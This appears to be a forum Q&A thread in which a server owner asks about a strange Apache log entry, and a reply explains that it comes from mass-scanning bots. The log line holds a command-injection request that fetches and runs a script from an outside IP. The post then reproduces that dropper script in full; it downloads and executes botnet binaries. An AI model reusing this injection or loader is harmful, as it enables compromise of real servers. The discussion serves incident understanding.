What kind of strange requests to the website?

T

Type Programmer2018-08-28 18:55:49

linux

Type Programmer, 2018-08-28 18:55:49

It costs apache web server. I decided to look with interest at the logs in /var/log/apache2/access.log
There is some strange request:

"GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.171/bin%20-0%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"

For fun, I decided to take the IP that is in the request and drive in the browser
http://176.32.33.171/bin
. A file with the contents was downloaded:

n="kenjiro.arm kenjiro.arm7 kenjiro.mips kenjiro.mpsl"
http_server="176.32.33.171"
dirs="/tmp/ /dev/ /dev/shm/ /var/ /var/run/ /var/tmp/"

for dir in $dirs
do
 >$dir.file && cd $dir
done

for i in $n
do
 cp $SHELL $i
 >$i
 chmod 777 $i
 wget http://$http_server/$i -O- >$i || curl -O http://$http_server/$
 chmod 777 $i
 ./$i
done

And before that there was already something like that, the content there, if not identical, then well, it looks very similar, I don’t remember. But the name of the file was different.

Reply

Answer the question

In order to leave comments, you need to log in

1 answer(s)

S

Stalker_RED, 2018-08-28
@MegaCraZy6

Chinese bots have found you and are trying to upload a shellcode or a virus to you.
RUN!
I answer in advance the question "how did they find me?":
It takes about 25 minutes to scan ALL ipv4 ADDRESSES on one port (80?). They were not looking for you personally, but for any web servers in general. And everyone is trying to sell the virus. And it's not just the Chinese who do this.